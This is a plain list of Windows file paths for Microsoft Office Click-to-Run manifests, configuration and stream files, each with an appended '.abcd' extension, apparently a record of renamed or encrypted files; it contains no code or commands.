C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates Logon.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.wordmui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.proofing.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.es-es.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.powerpointmui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.osmuxmui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.osmmui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.onenotemui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office32mui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.dcfmui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.man.dat.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.hash.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.db.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\s640.hash.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\MasterDescriptor.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\mergedVirtualRegistry.dat.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.man.dat.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.hash.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.dat.cat.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\s641033.hash.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\MasterDescriptor.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserManifest.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\UserDeploymentConfiguration.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\DeploymentConfiguration.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.0.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemui.msi.16.en-us.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\DeploymentConfig.2.xml.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\x-none.16\stream.x64.x-none.dat.cat.abcd
C:\ProgramData\Microsoft\ClickToRun\ProductReleases\439491D5-8347-4869-A58B-3CA02BA8E992\en-us.16\stream.x64.en-us.db.abcd